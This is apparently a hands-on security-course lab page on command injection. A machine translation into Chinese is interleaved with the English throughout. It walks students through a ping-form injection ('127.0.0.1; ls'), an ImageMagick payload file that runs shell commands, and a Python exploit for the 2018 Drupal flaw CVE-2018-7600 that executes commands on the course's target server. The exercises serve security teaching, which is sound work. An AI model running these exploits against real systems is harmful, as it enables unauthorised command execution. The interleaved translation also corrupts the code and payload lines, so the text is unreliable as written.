ED 102: Command Injection (60 pts) ED 102:命令注入(60分)

Ping Form (20 pts) Ping表格(20分)

The form below lets you send pings to a remote host.下面的表单允许您将ping发送到远程主机。 Unfortunately, it has a vulnerability.不幸的是,它有一个漏洞。

To use the form normally, enter a target, such as要正常使用表单,请输入目标,例如

127.0.0.1 127.0.0.1
To see the vulnerability, enter要查看漏洞,请输入
127.0.0.1; 127.0.0.1; ls LS
Target IP: 目标IP:

Challenges: Find the Flags (20 pts)挑战:寻找旗帜(20分)

There are four flags available on this server:此服务器上有四个标志:

ImageMagick Vulnerability (20 pts) ImageMagick漏洞(20分)

Normal Usage正常使用

  1. Get a normal GIF or JPEG image获取普通的GIF或JPEG图像
  2. Upload it using the buttons below使用下面的按钮上传它
  3. Click the thumbnail to see your image单击缩略图以查看图像
Select image to upload:选择要上传的图片:

Vulnerability漏洞

Make a text file with these contents:制作包含以下内容的文本文件: 
 push graphic-context viewbox 0 0 640 480 fill 'url(https://example.com"|echo "HELLO";date;")' pop graphic-context
Save it as exploit.jpg .将它保存为exploit.jpg Upload it using the form above on this page.使用此页面上方的表单上传。

The "echo" and "date" commands execute, as shown below.执行“echo”和“date”命令,如下所示。

Challenges: Find the Flags (20 pts)挑战:寻找旗帜(20分)

There are two flags available in the "chal2" folder: “chal2”文件夹中有两个标志:

Drupal Command Injection (20 pts) Drupal命令注射(20分)

Background背景

In April, 2018, a critical Drupal vulnerability was announced, and exploit code became available, as detailed here:在2018年4月,宣布了一个关键的Drupal漏洞,漏洞代码变得可用,详情如下:

https://thehackernews.com/2018/04/drupal-rce-exploit-code.html https://thehackernews.com/2018/04/drupal-rce-exploit-code.html

In this project, you'll perform that attack.在这个项目中,你将执行该攻击。

Viewing the Vulnerable Website查看易受攻击的网站

In a browser, go to:在浏览器中,转到:

https://drupal.samsclass.info/ https://drupal.samsclass.info/

It's just a default installation of Drupal, as shown below.它只是Drupal的默认安装,如下所示。

Preparing the Attack准备攻击

Using a text editor, such as nano or Notepad, create a file named dru.py containing this code.使用文本编辑器(如nano或Notepad)创建一个名为dru.py的文件, 其中包含此代码。 Change the filename YOURNAME to something unique in all three places it appears.将文件名YOURNAME更改为它出现的所有三个位置中的唯一名称。 
import sys导入系统
import requests导入请求

# Based on https://github.com/a2u/CVE-2018-7600 by Vitalii Rudnykh #基于Vitalii Rudnykh的https://github.com/a2u/CVE-2018-7600

target = "https://drupal.samsclass.info/" target =“https://drupal.samsclass.info/”

url = target + 'user/register?element_parents=account/mail/' \ url = target +'user / register?element_parents = account / mail /'\
      + '%23value&ajax_form=1&_wrapper_format=drupal_ajax' +'%23value&ajax_form = 1&_wrapper_format = drupal_ajax' 
      
payload = {'form_id': 'user_register_form', '_drupal_ajax': '1', payload = {'form_id':'user_register_form','_ drupal_ajax':'1', 
           'mail[#post_render][]': 'exec', 'mail[#type]': 'markup', 'mail [#post_render] []':'exec','mail [#type]':'markup',
           'mail[#markup]': 'echo ";-)" | 'mail [#markup]':'echo';-)“| tee YOURNAME.txt'}发球YOURNAME.txt'}

r = requests.post(url, data=payload) r = requests.post(url,data = payload)

check = requests.get(target + 'YOURNAME.txt') check = requests.get(target +'YOURNAME.txt')
if check.status_code != 200:如果check.status_code!= 200:
  sys.exit("Not exploitable") sys.exit(“不可利用”)
  
print ('\nCheck: '+target+'YOURNAME.txt')打印('\ n检查:'+目标+'YOURNAME.txt')

Running the Attack运行攻击

In a Terminal or Command Prompt window, execute this command:在“终端或命令提示符”窗口中,执行以下命令: 
python dru.py python dru.py
The attack succeeds, creating a file on the target server, as shown below.攻击成功,在目标服务器上创建一个文件,如下所示。

Challenges: Find the Flags (20 pts)挑战:寻找旗帜(20分)

There are two flags on this server:此服务器上有两个标志:

Posted 4-21-19发表于4-21-19
ImageMagick & Drupal added 4-23-19 ImageMagick和Drupal添加了4-23-19